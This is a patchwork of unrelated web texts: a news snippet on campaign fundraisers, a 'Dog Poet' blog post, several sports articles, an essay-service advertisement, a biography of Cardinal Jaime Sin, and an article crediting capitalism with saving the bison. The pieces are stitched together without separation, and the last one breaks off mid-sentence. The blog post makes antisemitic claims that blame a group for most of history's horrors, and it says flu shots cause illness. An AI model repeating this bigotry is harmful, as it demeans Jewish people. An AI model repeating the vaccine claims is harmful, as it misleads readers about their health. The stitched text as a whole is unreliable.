Obama is still haunted by a comment he made at a 2008 fundraiser in San Francisco, calling voters in small town Pennsylvania "bitter" and saying they cling to "guns or religion." He learned a lesson: At events during his 2012 campaign, staffers set up a table where guests were expected to check their cellphones before entering. Clinton has tried to ban tweeting, Instagram and other forms of social media at some of her events.
Four years ago, a waiter recorded and leaked remarks GOP nominee Mitt Romney made about the "47 percent" of voters who are "dependent on government and would vote for Obama "no matter what" at a closed Florida fundraiser. After his convention, Romney started opening his fundraisers to the media to grab headlines, especially on days when he had no other public appearances.
His former aides say that's not a problem for Clinton.
"Quite frankly, if I'm her, it may not be a bad thing to let Donald Trump be the only candidate making news on any given day," said former Romney campaign aide Ryan Williams. "She can stay dark for five straight days and let Trump trip all over himself."
---
© 2016 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed. Learn more about our Privacy Policy and Terms of Use.
Dog Poet Transmitting.......
This is something I will never have to apologize for. First off, because I'm not a coward, a money junkie or a money whore and secondly because the truth is antisemitic. Thing is that I admire and seek the truth in all circumstances and I don't mind being slandered; only what God thinks of me counts, period. The truth tells me that a certain group within a group; that uses the one group as a cover for bad behavior, is responsible for more torment, horror, mayhem and incredible lies, over the course of recorded history (when one measures the population of the evil doers against the larger world population) than all the rest of humanity on this planet. That's a fact. You can argue against it, you can stamp your feet, you can howl and shriek but you can't alter a single line of it in the book of the recording angel.
As far as antisemitism goes, let's consider what Shulamit Aloni had to say about it. I realize that in this time frame I killed my chances at being recognized as an artist at a wider reach but I don't care about that. I'm still an artist and the audience I was really after, heard and read my work.
If I were a whore or a shrinking violet, I would have played the game but I would have tarnished my soul in my own eyes and I only care what God thinks about me. Some things are just more important than others. I don't mind having been poor all my life. I'm actually more wealthy than people who have a hundred times what I have because there is very little I want that is for sale. What I value is priceless and I got it for free, just like I do everything that I enjoy. Once I got my keyboard, guitars and computers, there wasn't anything else I needed or wanted. God always takes care of my food and shelter needs so... I've pretty much got it all.
We're only on this planet for a short time as we are now. Of course, the vast majority of us come and go countless times because we have appetites and desires that haven't been assuaged. What if you only desire one thing? What if you don't have to keep coming back here over and over (and you don't); unless you are here of your own free will to lend a hand? What if ( and there are ) lands of far more refined substance where the enjoyments and amenities are well beyond the reach of the general human imagination?
Look at this fellow Smollet. He staged a slanderous false flag hate crime because he was dissatisfied with his salary. Even exposed with evidence that cannot be denied, he denies it. I don't even have a salary and I'm not dissatisfied with it. People are poor because their desires outstrip their income and even when they can afford anything, they're still not happy. Wander through the swank sections of any urban crime scene, which is what I call their neighborhoods, you don't see all that many smiles. I've been there. I've seen it. Wander through most third world villages and the people are smiling and far more naturally generous than you will ever see in the upscale crime scene locations. I've been there.
Why is it that people are often happier with next to nothing than are people with more shit than they can keep track of? It's a mystery, except it's not.
Here's another thing that is considered a mystery, except it's not. People make themselves sick if they get sick. People who get flu shots get the flu or something else and people who don't get flu shots (like me and some of you) don't get flu or something else. Everything happens in your mind. That's where it starts and the way you feel begins to determine how you feel. That last may seem confusing but it's not. People talk themselves into everything that happens to them. It starts with a conversation that occurs, to begin with, below the radar. Then it becomes a conversation they can hear in their heads and then; inexplicably or... explicably, they find themselves in some place or situation they talked themselves into. A lot of the time they let someone else talk them into it. Someone told them that if they dressed like this and acted like that, then certain things would happen for them. It could be they were right but the reality of it turned out to be very different from the commercial.
I'm sure there are a lot of men who find Ariana Grande attractive. What they see is not what I see; which is a high maintenance twit with the IQ of a pigeon and the personality of a mink.
Now there are going to be people who think it was mean of me to say that, even though the examples were kind by comparison with the reality. That song is one of the most popular tunes going at the moment and she broke some record held by the Beatles Here are the most popular Instagram accounts;: 148M.: 144.5M.: 138.8M.: 124.4M.: 121.9M.: 121.4M.: 121.2M.Here are the most popular Facebook accounts;- 122.1 million likes- 104.6 million likes- 101.6 million likes- 90.4 million likes- 89 million likes- 81 million likes- 78.7 million likes- 75.4 million likesAnd (drumroll) here are the most popular Snapchat accounts;I haven't even heard of some of these people and I know next to nothing about the rest, except maybe the actors because I watch movies. I still don't know anything about them but then, neither do they.What you see in this world is the outworking of Karma. Some people earned what they are presently enjoying; if they are enjoying it. Some are paying their dues for future dream lives. Everyone is experiencing what brought them to that moment and the meter is always running. Sooner or later it is gone. In most cases, what the rich and powerful and famous have, in many cases, the only thing they have, is the illusion that they are better off than you but... the wheel is always turning and who knows what waits ahead? What celebrity brings you, generally, is a hairnet of flies and mosquitoes that follow you everywhere you go. What riches brings you is an environment of people who want what you have and a family that is waiting for you to die. In all of these privileged cases, the players never know how anyone really feels about them. I've been among these people and seen a thing or two; like J.K. Simmons in the Farmers Commercials Why I am writing the way I am today is an attempt to tell you that no one really has it better than you. They just have it different. Even when they have all the things you wish you had. It will be gone in what seems to be a much shorter period of time on the back end than it was on the front end.What most people, especially in Western Culture do not get is that God is the Supreme Enjoyer and God lives in you. He might be hardly noticed or off in the corner, as is generally the case in Times of Material Darkness but God is most definitely there or... you wouldn't be. In this culture, people usually have a very skewed idea of what God is like. Mostly you have an anthropomorphic God.Here is something to remember. The more intensely you seek the divine, the sooner you come into the presence and that is a state of endless joy and bliss. If you don't have it right this moment, that SHOULD BE Job One until you do because everything else is strangely hollow and nothing like it looked like it was before you got it. If you put everything you have into finding the ineffable, you will have everything you desire and oh so much more that you didn't even know existed. Once you realize how absolutely true this is you will see that you live in a world of crazy people who are chewing off their own foot and telling you how good it tastes. This might seem like an extreme example but it won't be when your eyes are opened.Until you find God you don't even know what anything is, including yourself, which is your biggest mystery. The kicker is that God is actually there. This is not a lie. Everything else may be but this is not and no matter how many years and lives you pour into variations on the theme of suffering, it will all prove to have been meaningless. The one thing that is not meaningless is the divine and it is all that remains when everything else is gone.A long time ago, God shattered himself into countless pieces. Following that event, he has spent the rest of his time gathering up those scattered pieces. You can literally head him off at the pass. “Success is speedy for the energetic.”End Transmission.......
The importance of Mark Wood to England's hopes of winning a first 50-over global tournament looks set to be underlined when the squads for the forthcoming series against Ireland and South Africa, and the Champions Trophy in June, are named on Tuesday morning.
Wood, whose additional pace gives him a marked point of difference over potential rivals, is back bowling for Durham this season following a third ankle operation during the winter and, having reported no ill-effects, is expected to receive his first call-up since winning the last of his 11 one-day caps against Pakistan last summer.
County cricket: Hampshire v Yorkshire, Middlesex v Essex – live! Read more
The 27-year-old's wicket-taking threat in the middle overs and David Willey's return from a shoulder injury to resume new-ball duties could mean Steven Finn missing out on the squad for the Champions Trophy starting against Bangladesh at the Oval on 1 June. Jake Ball, Ben Stokes, Chris Woakes and Liam Plunkett are the other seam options for the captain, Eoin Morgan.
While Wood's fitness record is not great – he reported a tight groin after Durham's four-day draw at Gloucestershire on Monday – England can make changes up until 24 May and from there alterations are still possible provided they are in response to injury and approved by the ICC's event technical committee; in past tournaments it has been accommodating.
“Woody is one of these guys that, when he is up, he is seriously up,” the Durham captain and occasional England fielding coach, Paul Collingwood, told the Guardian. “There aren't many quicker bowlers than him in the world but he has great skills too. He will have to be managed. You won't use him day in and day out. But he gives you an x-factor and something different from what we've had for some time. He's a huge asset for any team.”
Collingwood remains the sole England captain to lift a global trophy – the World Twenty20 in 2010 – and on the subject of their status as Champions Trophy favourites he added: “It's pressure they will have to get used to because anyone who has watched them in the last two years knows they have a real chance of winning a world tournament. In the past it's been hope but there is genuine belief now around the country we could do something special. There are not many teams with that power in the batting line-up – we tick a lot of boxes. It's a great opportunity to gain some confidence for the World Cup in 2019.”
With Stokes, Woakes and Jos Buttler all skipping the two-match one-day series with Ireland on 5 and 7 May and to remain playing in the Indian Premier League, two batsmen who have struggled to crack what is a competitive line-up, Sam Billings and Jonny Bairstow, will surely get the chance to play at Bristol and Lord's.
Which of them keeps wicket remains to be seen, although Billings – not Test gloveman Bairstow – was touted as next in line by Paul Farbrace, England's assistant coach, during the tour to the Caribbean in March. Having previously been expected to name 12 for Ireland's first visit, England will expand this to 14 as Plunkett returns from a calf problem that has curtailed his start to the season with Yorkshire. Lancashire's in-form Liam Livingstone or Ben Duckett could also come into the setup for experience.
From there, and with the IPL trio back, England will face South Africa in three one-day internationals, starting in Headingley on 24 May, that lead into the Champions Trophy. The Twenty20 series against South Africa that follows the tournament, and the one-dayers against West Indies in September, are more likely to admit experimentation with fringe players when rest is given to Test mainstays.
England squads for Ireland series (possible)
Hales, Roy, Root, Morgan (c), Billings, Bairstow, Moeen, Plunkett, Rashid, Willey, Wood, Ball, Finn, Livingstone
England squads for South Africa series and Champions Trophy (possible)
Hales, Roy, Root, Morgan (c), Buttler, Stokes, Moeen, Woakes, Rashid, Plunkett, Wood, Billings, Bairstow, Ball, Willey
Quiz: Are You Smarter Than A South African High School Student?
Do you keep up with international news?
This quiz will give you a chance to find out.
The Interschool Quiz made its debut in 1993. It's a project of the Western Cape Branch of the South African Institute of International Affairs (SAIIA), designed to boost interest in global matters. This year, 55 schools participated after ten days of reading articles from the Cape Times and special articles from the SAIIA online "Diplomatic Pouch" articles. The winning team earned a cash prize for their school and an invitation to the annual SAIIA Young Leaders Conference. All schools received books for their library.
P.S.: Don't feel bad if you flame out. An NPR staffer who covers global topics scored a four out of 13.
The recent success of the Impact is often attributed to the same few individuals, Drogba, Piatti, Ciman and as of late Mauro Biello. However, there is always one man that flies under the radar, and thats Evan Bush. Bush signed with the Impact in 2011 while the club was still in the NASL.
It was during that season that he also won the NASL Golden Glove award for goalkeeper with the best goals against average and was named the Impacts defensive player of the year. Bush looked to have a bright future with the club and was poised to be the keeper of the future.
All was well and good for Bush leading into the Impacts inaugural MLS seasons in 2012. He had just signed a new deal with the club and was ready to play big MLS minutes. Then as is the norm with any new team trying to make a name for themselves in a new league, the Impact began bringing in bigger name players to fill out their roster.
This foray into the transfer market left Bush as the Impacts third string keeper, behind Greg Sutton and Donovan Ricketts. The season which had so much promise for Bush ended up being a dud, as he only started one game for the Impact. The ensuing 2013 campaign was more of the same for Bush, as he only started nine games, eight of which were non-MLS contests.
This brings us to the Impacts infamous 2014 season, a season which was marred by ugly losses and a last place finish in the MLS table. Although the season was a disaster for the club overall, the goal-tending situation was interesting to watch. Bush finally began getting more MLS starts and was showing his worth in all of them. Perkins who was still considered by the club to be the first string keeper was put on the hot seat.
Bush ended up playing 13 MLS games (21 overall with the CCL) and recorded a clean sheet in 3 of them, 6 total when including the CCL once again. As any soccer fan would tell you, measuring a goalie worth entirely based on clean sheets is flawed, although it was evident that in these performances Bush showed the spark and tenacity needed to be an MLS keeper.
The only good thing to come out of the Impacts 2014 season was a berth in the CONCACAF Champions League. As any Impact fan or Montrealer for that matter would know, the clubs legendary run was unlike any other clubs in MLS history. Evan Bush started all these games except one, the ill-fated final at the Olympic Stadium. It was during this dream-like run that Evan Bush showed us all just how good he is.
Although the Impact failed to win the tournament, Bush's efforts were rewarded as he was named the tournaments the best goalkeeper. The tremendous form Bush exhibited during the CCL transitioned into the MLS season, where he showed us all once again how talented he truly is.
This talent shined brighter than ever on May 23rd 2015. Dallas' Matt Hedges had just the scored in the 77th minute to bring Dallas within one goal. The next thirteen minutes were an absolute clinic by Evan Bush. I remember cheering louder than ever for Bush's saves that night. He put the team on his back, and finally the fans had noticed.
This season has been one of great promise for the Impact. They have arguably the best CB in the entire league and signed one of the biggest strikers in soccer history, all while fighting for a playoff spot. It's easy for us to get lost in the excitement of Laurent Ciman and Didier Drogba, but we mustn't forget about the man backstopping them. The consummate professional and unsung hero of the Impact, Evan Bush.
It's not as tough as how people make it out be. In fact, it's just a test of time and knowledge. So start early, prepare with weeklyessay.com and finish early. Like all things, don't think it's easier said than done. But there are a few strategies you can use to your advantage and must know before starting with this task.
Here are the top five things to keep in mind before you start writing your thesis
Stay grounded and focused More often than not, you will be too scared to do anything for the single purpose that there will be a huge bundle of things that needs to be done. The most essential way of laying down a solid foundation for your study will be to come up with an aim or more appropriately, a mission statement. This statement is the summarized and condensed description of your entire work. More often than not, it cannot exceed one line. After you have come up with an appropriate title, put it up somewhere you can see it always, every day. This sort of serves as a motivation factor as well.
More often than not, you will be too scared to do anything for the single purpose that there will be a huge bundle of things that needs to be done. The most essential way of laying down a solid foundation for your study will be to come up with an aim or more appropriately, a mission statement. This statement is the summarized and condensed description of your entire work. More often than not, it cannot exceed one line. After you have come up with an appropriate title, put it up somewhere you can see it always, every day. This sort of serves as a motivation factor as well. Distractions are a given To forget is human, to remember inappropriate things and chores at study time is also human. This is one of the biggest hurdles you will face when starting and during your work. Just when you think you have some momentum and get stuff done, you suddenly happen to remember some chores to run and appointments that had to be made yesterday. The dilemma is a sure thing in guaranteeing you are deviating from your work. So, keep a small pad by your side and make a list of everything you remember and to-do's. Make it a point not to let anything get in the way of your research.
To forget is human, to remember inappropriate things and chores at study time is also human. This is one of the biggest hurdles you will face when starting and during your work. Just when you think you have some momentum and get stuff done, you suddenly happen to remember some chores to run and appointments that had to be made yesterday. The dilemma is a sure thing in guaranteeing you are deviating from your work. So, keep a small pad by your side and make a list of everything you remember and to-do's. Make it a point not to let anything get in the way of your research. The draught of ideas When you start with your report you are bursting with ideas and thoughts. But you will gradually filter out the good ones from the bad, the relevant ones from the irrelevant ones. At the end you are left with nothing but a handful of ideas that seem a little bleak and less exciting than then before. Bear in mind that this is a completely normal thing. But keep on writing. Do not stop. Just write.
When you start with your report you are bursting with ideas and thoughts. But you will gradually filter out the good ones from the bad, the relevant ones from the irrelevant ones. At the end you are left with nothing but a handful of ideas that seem a little bleak and less exciting than then before. Bear in mind that this is a completely normal thing. But keep on writing. Do not stop. Just write. Schedule Prepare a schedule with a fixed time and preferably a fixed place as well when you can work on your research. This helps develop a habit of perseverance. Make it a point to finish a certain number of pages at the end of each session. This helps with your great deal than you think you will.
Prepare a schedule with a fixed time and preferably a fixed place as well when you can work on your research. This helps develop a habit of perseverance. Make it a point to finish a certain number of pages at the end of each session. This helps with your great deal than you think you will. Rome wasn't built in a day No research was done in a day either. You can't expect to have everything done by working a couple of hours straight. It requires more than that. So make it a point to prepare yourself for the long haul.
So, there you go, top five things that will help you throughout your assignment. Keep calm and stay focused.
Jaime L. Sin (born 1928) was a cardinal of the Roman Catholic Church who served in the Philippines. He was instrumental in the defeat of the Marcos regime and in the installation of Corazon Aquino as president in 1986.
Jaime L. Sin, cardinal of the Roman Catholic Church, was born in the town of New Washington, Aklan, in the Visayan Islands of the Philippines on August 21, 1928. He was the seventh of nine children of Juan Sin and Maxima Lachica.
Cardinal Sin began his missionary career in Jaro, Iloilo, where he attended the Jaro Archdiocesan Seminary of St. Vincent Ferrer. He was ordained a priest on April 3, 1954. He served as priest of the Diocese of Capiz from 1954 to 1957 and became rector of St. Pius X Seminary in Roxas City from 1957 to 1967. While serving in the church he obtained a bachelor's degree in education from the Immaculate Concepcion College in 1959. In 1960 Pope John XXIII named him as domestic prelate.
He assumed several positions in archdioceses in the Visayan Islands—from titular bishop of Obla, auxiliary bishop of Jaro, to apostolic administrator of Seda Plana, archdiocese of Jaro, to titular archbishop of Massa Lubrense and co-adjutor archbishop of Jaro. He subsequently became metropolitan archbishop of Jaro in 1972 and metropolitan archbishop of Manila, the capital of the Philippines, in 1974.
Sin was named cardinal by Pope Paul VI on May 26, 1976. He was elected permanent member of the Synod of Bishops in Rome.
Cardinal Sin was known for his good sense of humor. He jokingly called his residence "the House of Sin" and smiled at the ironic combination of his name and title.
But in a largely Catholic country plagued by a dictatorship from 1972 to 1986, Cardinal Sin often suppressed his smiles. He increasingly criticized the Marcos regime for its indifference to the plight of the poor. While advocating an independent church, he supported intervention in "the morality of politics." Thus he caught the ire of President Marcos and the First Lady many times over his criticisms of the government's human rights violations and over Imelda's extravagant expenditures.
The cardinal became very vocal about the violence and cheating which characterized Philippine elections in the 1970s and 1980s. In the 1978 elections for delegates to the National Assembly, he issued an open letter "calling on church members to report any instances of fraud."
His involvement became more active in 1986 when President Marcos called for snap elections for president and vice-president. Marcos needed a new mandate to convince the world of the legitimacy of his regime.
The opposition saw the opportunity to field candidates against the president. One candidate put up was Corazon Aquino, widow of the senator who was jailed by Marcos, went to self-exile in the United States, and was murdered upon his return to the Philippines in 1983. Cardinal Sin played an important role in unifying several factions and candidates of the opposition. He convinced ex-Senator Salvador Laurel to run for vice-president, with Corazon Aquino as president. Aquino agreed, in turn, to run under Laurel's banner, the UNIDO Party.
The opposition rallied behind the Aquino-Laurel ticket. However, conflicting counts were reported by the government's Commission on Elections (COMELEC) and the volunteer group National Movement for Free Elections (NAMFREL). The Marcos-leaning legislature proclaimed the Marcos ticket victory on the basis of COMELEC tallies. The people protested.
In the military some 300 officers rebelled against the president and Chief of Staff Fabian Ver. The minister of national defense, Juan Ponce Enrile, and deputy chief of staff Fidel Ramos led the rebellion, asking Cardinal Sin to protect the army against the president's reprisal by mobilizing civilian support. The cardinal made an appeal by radio, and the people, Catholic and non-Catholic alike, heeded his call. They went by the millions to stand guard against the gates and fences of the military camp where the rebels stayed. When government tanks and weapons were sent to crush the rebellion, the people's prayers, smiles, and protests prevented the government troops from firing. The president, in desperation, fled the country. The rebel government installed Corazon Aquino as president.
In the 1990s, Cardinal Sin continued to maintain a high profile in the political life of the Philippines. During the 1992 election campaign, Cardinal Sin issued a pastoral letter in which he identified what he considered to be undesirable traits or behaviors in presidential candidates. In 1995, he publicly criticized the Christian Democratic coalition government of Protestant President Fidel Ramos, whom he referred to as a "Marcos clone." He also led massive rallies protesting various governmental policies, including Ramos's one for population control (1995) and for the issuance of national identification (ID) cards (1997). Thus the cardinal who would not intervene played a crucial role in Philippine politics. This was consistent with his reading of the role of the church in a democracy.
He maintained his residence in a suburb of Manila, where he continued to entertain both humble and mighty guests, welcoming all into the "House of Sin" with a modest smile.
Further Reading on Jaime L. Sin
Cardinal Sin's bio-data is included in The Philippines Who's Who by D. H. Soriano and Isidro L. Retizos (Manila, 1981). Many articles have been written about Cardinal Sin's fight with the Marcoses. Among them are Rodney Tasker's pieces in the Far Eastern Economics Review: "Cardinal Sin Speaks Out" (July 21, 1978) and "Archbishop Sin Fights a Boardroom Battle" (August 4, 1978). In the Philippines, several articles have been written about him. These include: C. F. Makabenta's "A Night in the House of Sin," Expressweek (November 15, 1979) and Dexter H. Irisar's "Conversation with Archbishop Sin," Expressweek (October 10, 1974). The Catholic paper Veritas also carried numerous articles about him.
Bob McKenzie TSN Hockey Insider Follow|Archive
As a member of the Professional Hockey Writers' Association who gets to vote on a variety of NHL regular-season awards, there are a number of difficult questions that arise each year.
The questions tend to be a lot more straightforward than the answers.
For example: Should Drew Doughty or Erik Karlsson win the Norris Trophy as the NHL's best defenceman?
We've already been treated to multiple dissertations on that subject, as well as some spirited Twitter debate. There's more to come, I'm sure, so we'll get to that in a bit.
But sometimes a basic question like that one or, who should win the Calder Trophy for the best performance by a rookie player, give way to a larger philosophical musing.
To wit, as I ponder the merits of Doughty vs. Karlsson, I first find myself asking another question: Should it matter that Karlsson's Ottawa Senators are not going to the Stanley Cup playoffs?
I was somewhat surprised recently to read that in the 61-year history of the Norris Trophy, the winner has never missed the playoffs.
When I heard that, I wasn't quite sure what to make of it.
The same would be true on another question, as it pertains to making my decision-making on the Calder Trophy voting.
That is, how many games should a skater have to play in order to win a major individual award such as the Hart, Norris or Calder? Or, how many games can a player miss before being effectively disqualified for a major award? Or, perhaps more precisely, I suppose, can Connor McDavid win the Calder Trophy playing just 45 of 82 games?
The short answer to any of these questions is any voter is free to do as he or she sees fit. Outside of some basic criteria in the specific description of each award, it's wide open.
When I'm pondering these things, and I do like to ponder almost as much as I like to use the word ponder, I often value the counsel and opinions of others, most of whom I'd say may be wiser than me. One of the benefits of this job is having access to a lot of a really smart and interesting hockey people who are happy to share their opinion.
So since I have questions, four of them actually, I've come up with a pretty spectacular expert hockey panel to help answer those questions and provide a little perspective that could help me, or others, at voting time.
For obvious reasons, my super savvy expert panel has to remain anonymous, but I can tell you that I ended up with 21 participants, roughly split into three groups — some NHL head coaches, some NHL general managers and some Hockey Hall of Famers. If you saw the names, trust me, you'd be impressed. I know I was.
So here are the four questions I put to them and a summation of how they collectively answered:
1. In your opinion, should a skater with less than 60 games played win a major individual award (Hart/Norris/Calder)?
The only information I supplied to the panellists was that since the 1966-67 season — the last year of the Original Six and the first season Bobby Orr played in the NHL — there has been only one occasion when a skater with less than 60 games won a major individual honour.
That was Orr in 1967-68, when in his second NHL season he won his first Norris Trophy as top defenceman on the strength of 46 games played in a 74-game regular season.
Sixteen of 21 respondents answered no, a skater should not be getting a major individual honour for less than 60 games played. Now, a handful of those 16 did want to qualify it a bit, suggesting that it can't be a hard-and-fast rule; that, if a player who dominated the league had played close to 60, well, exceptions could be made.
Not unlike, say, Mario Lemieux in 1992-93, when he won the Hart Trophy as NHL MVP playing in only 60 of 84 games that season.
But generally speaking, the prevailing view was they would be hard pressed to vote for a Calder winner with less than 60 games unless there was some extraordinary circumstance.
Five of the 16 panellists answered yes, that they would have no problem whatsoever with a skater playing less than 60 games getting a major individual award.
Safe to conclude the majority of panel thinks the games played total matters.
It is interesting to note that in the last 19 years, excluding the three occasions a goalie won the Calder, 10 of the 16 skaters who were named rookie of the year played in all 82 games in their freshman season.
In fact, the most number of games a rookie winner missed in any Calder year since the advent of the 82-game season in 1996 is four. Evgeny Malkin played in 78 of 82 in 2006-07; no one else (Sergei Samsonov, Chris Drury, Alexander Ovechkin and Aaron Ekblad) missed more than one or two games.
2. Which of Philadelphia's Shayne Gostisbehere, Edmonton's Connor McDavid or Chicago's Artemi Panarin would you choose as your Calder Trophy winner?
Panellists were instructed they could write in another rookie if they wanted someone other than the three listed.
The results:
Panarin 15
Gostisbehere 4
McDavid 1
Larkin (write in) 1
Here's a comparative look at the numbers they've put up this season:
Calder Race Player Team GP Goals Assists Points Artemi Panarin Chicago Blackhawks 78 28 46 74 Dylan Larkin Detroit Red Wings 77 23 22 45 Connor McDavid Edmonton Oilers 43 15 30 45 Shayne Gostisbehere Philadelphia Flyers 60 16 27 43
Given the way respondents answered the first question on the importance of games played, perhaps it comes as no surprise McDavid received little support as the Calder winner.
Multiple panellists duly noted McDavid is going to be the best player of his rookie class and may well emerge very quickly as the best player in the game, period. But in the view of the majority, the Calder goes to the best rookie performance, not who's going to be the best player.
“I'm sure we all believe if McDavid had played a full season, it would have been no contest,” one panellist said. “But he didn't. His numbers were tremendous for the games he did play but Panarin and Gostisbehere have been outstanding. Maybe if there weren't a viable option to McDavid, but there is.”
Many of those voting for Panarin readily acknowledged the perceived inequity of a 24-year-old with six seasons of experience in the KHL competing against a 19-year-old true, first-year pro.
“Those are the rules,” one voter said. “We can't ignore the rules. Panarin is a rookie. If it were really close between Panarin and another player, maybe you could use that criteria as a tiebreaker to give to younger player.”
As for the argument Panarin benefited from playing alongside Patrick Kane on a Cup contender, duly noted, but some of his supporters said it's not a fluke Kane had his best season with Panarin working alongside him.
“Panarin, Panarin, Panarin,” is how one of the Hall of Fame players said he would vote.
“It's not McDavid's fault he played on a team that isn't as talented and doesn't play many meaningful games,” another panellist added, “but it's not Panarin's fault either.”
As for supporters of The Ghost, one said it's obvious to him which rookie player had the greatest impact on his team this season: "Do you think Philadelphia is competing for a playoff spot right now if not for [Gostisbehere]?"
3. Should playing on a non-playoff team disqualify a defenseman from winning the Norris Trophy?
No 13
Yes 8
While the majority of the blue-ribbon panel said a non-playoff year shouldn't preclude Norris consideration, many of the 13 respondents did say it could and should be some factor in their voting, and that it would have to be taken on a case-by-case basis.
It is worth pointing out that many Doughty supporters will cite this as a reason why the Kings' defenceman is a better choice this season than Ottawa's Karlsson, though it must be noted that in voting last year, even though Karlsson won the Norris, Doughty had more first-place votes in a season in which the Kings didn't make the playoffs.
And while the majority answered no to this question, it was by no means overwhelming. Eight of those voted yes, playoffs matter, and were adamant that to win a major award the player needs to lead his team to the playoffs.
4. Who is your choice for the Norris Trophy: Drew Doughty or Erik Karlsson?
Panellists were told they‎ could write in any defenceman of their choice if they believed someone other than Doughty or Karlsson warranted the award.
The results:
Doughty 18
Karlsson 2
Letang 1
‎It wasn't even close. A landslide.
Most of the Doughty fan club on this esteemed TSN Hockey panel espoused the commonly heard arguments we've seen in stories and on recent Twitter fights.
That is, as good as Karlsson is offensively, Doughty better embodies the definition of an all-around defenceman.
Norris Race Player Team GP G A PTS plus/minus Erik Karlsson Ottawa Senators 80 16 64 80 -3 Drew Doughty Los Angeles Kings 80 14 37 51 25 Kris Letang Pittsburgh Penguins 70 16 50 66 7
A sampling of some pro-Doughty comments:
“Doughty plays in a tight system and sacrifices points to win,” said one Hall of Famer.
“It's Doughty for me...and by a wide margin,” said an NHL GM.
“Karlsson is amazing but No. 2 for me,” said another.
One Doughty supporter went so far as to lightheartedly suggest — at least I think it was lighthearted — that anyone voting Karlsson for the Norris should lose their voting privileges.
While Karlsson only garnered two of 21 votes, if the identity of his small group of supporters could be revealed, there'd be no jokes about suspending voting privileges.
Even some of the Doughty boosters acknowledged the debate has gotten a little out of hand, perhaps a touch too emotional or polarizing.
“It's gotten to the point now ‎where if you say you support one guy over the other it's taken as a criticism of the other guy,” said an NHL coach. “They are both phenomenal talents. If I say Doughty, and I do, I'm not saying anything bad about Karlsson.”
One GM who voted for Doughty did acknowledge he's a little bit conflicted by his own support.
“Like a lot of people, I believe [Doughty] is due to win his first Norris Trophy, and I do believe that," he said. "But I am wondering about the timing now. Look at Karlsson's season; look at the numbers he's putting up. It's incredible, really. I do sense there's this sentiment to make sure [Doughty] finally gets recognition, but I am kind of wondering if, given what Karlsson has done, this may be exactly the wrong time to give it."
It was interesting that one Hall of Famer went with Pittsburgh Penguin defenceman Kris Letang. Others went out of their way to laud San Jose's Brent Burns, too, but no one could see their way clear to put Burns ahead of Doughty or Karlsson.
The North American bison, widely known as the buffalo, will now likely be recognized as America's “national mammal”—on par with the bald eagle. (The bill is heading to the president's desk.)
It is a fine tribute to a creature etched into American lore. While praises are already being made to the efforts of conservationists and modern environmentalists to save North America's largest land mammal, the reality is that the species was saved by capitalism.
After describing how bison populations “dwindled from tens of millions to the brink of extinction,” a Huffington Post contributor wrote that the animal must be “acknowledged as the first success story of the modern conservation movement.”
Conservationists did play a role in saving the buffalo from extinction, but it was in large part the power of the free market that allowed the once-decimated species to thrive after nearly being wiped out.
The Bison as an Icon of the Old West
Any description of the Great Plains in the 19th century usually involves vast herds of the giant, imposing bison dotting the landscape. The great frontier historian, Francis Parkman, included numerous, vivid descriptions of buffalo herds and hunts in his books.
Parkman wrote in “The Oregon Trail,”
The face of the country was dotted far and wide with countless hundreds of buffalo. They trooped along in files and columns, bulls, cows, and calves … They scrambled away over the hills to the right and left; and far off, the blue pale swells in the extreme distance were dotted with innumerable specks.
Native American tribes of the Great Plains relied on the American bison for food when early American pioneers encountered them in the 18th and 19th centuries. The Plains Indians had unique hunting methods that were efficient, yet wasteful.
Anyone who has spent time in Wyoming, Montana, or any one of the Plains states is likely to have encountered giant, seemingly random craters. These are the remains of what were called “buffalo jumps,” and were the primary way many tribes cultivated the animal for food.
Frontier explorer Meriwether Lewis, of the famed Lewis and Clark expedition, described one of these jumps in an 1805 journal entry:
Today we passed on the Stard. side the remains of a vast many mangled carcases of Buffalow which had been driven over a precipice of 120 feet by the Indians and perished; the water appeared to have washed away a part of this immence pile of slaughter and still their remained the fragments of at least a hundred carcases they created a most horrid stench. in this manner the Indians of the Missouri distroy vast herds of buffaloe at a stroke.
It was a ruthless affair, but it got the job done. Squandering enormous quantities of meat was simply not a problem for the nomadic people of the plains. There seemed to be endless amounts of the beasts.
The dwindling of the American bison began long before settlers arrived, but a swelling population of new migrants finally put the species at risk. And the intentional extermination of the herds to drive out the Plains Native Americans left the buffalo on the brink of annihilation. At one point, there were only 300 of them left in the wild.
Saved by a Free Society and Market Economics
Though the social and economic dynamics of the 19th century came close to wiping out the American bison, the species survived and began a recovery in the 20th century. The wild-roaming bison had been hunted mercilessly to the brink of destruction, but widespread private ownership allowed them to flourish.
Historian Larry Schweikart wrote about a study by Andrew C. Isenberg, now a professor at Temple University, which busted the myth that it was government intervention that saved the bison. From a small herd clinging to survival in Yellowstone National Park, the bison began their resurgence. Isenberg's conclusion “upsets the entire apple cart of prior assumptions,” according to Schweikart:
This remnant herd and other scattered survivors might eventually have perished as well had it not been for the efforts of a handful of Americans and Canadians. These advocates of preservation were primarily Western ranchers who speculated that ownership of the few remaining bison could be profitable and elite Easterners possessed of a nostalgic urge to recreate . . . the frontier.
Preservation societies that aimed to maintain an authentic Western landscape, and travelling shows like Buffalo Bill's Wild West Show, were instrumental in keeping the tiny bison population alive. They did a much better job of protecting these valuable assets than the public national parks.
But even more than as a tourist attraction, the bison became prized for the same reason Plains Native Americans and settlers hunted them to begin with: they're delicious.
Isenberg's study showed that the number of bison swelled in the 20th century mostly because they were “preserved not for their iconic significance in the interest of biological diversity but simply raised to be slaughtered for their meat.”
Ranchers like Charles Goodnight, who provided the herd reintroduced into Yellowstone National Park in 1902, found ways to raise and profit from the bison. This led to a thriving national industry and ensures the bison will survive into the 21st century. Today there are around 500,000 buffalo in the United States, and about 90 percent are in private hands. And for that miracle resurrection, the world has capitalism, not Congress, to thank.
On Thursday's New Day on CNN, during a discussion of President Obama's decision to release five high-risk Taliban prisoners from Guantanamo Bay in exchange for hostage Sergeant Bowe Bergdahl, without even notifying Congress first, liberal CNN commentator Paul Begala took a gratuitous swipe at Republicans as he cracked that, "if Barack Obama cured cancer, the Republicans would attack him for putting oncologists out of work."
At about 8:30 a.m., after conservative commentator Cheri Jacobus gave her view of the Bergdahl prisoner trade, noting that Democrats have also been critical of the President, co-host Chris Cuomo turned to Begala and posed the question:
What's the other side on this issue of whether this is a group of both sides coming after the White House? Or is it just a political football being run by the Republicans?
Begala, who on Wednesday's show asserted that it was an "enormous problem" that President Obama broke the law that required him to inform Congress 30 days before releasing prisoners from Guantanamo, began by suggesting the White House may have had good reason for not doing so:
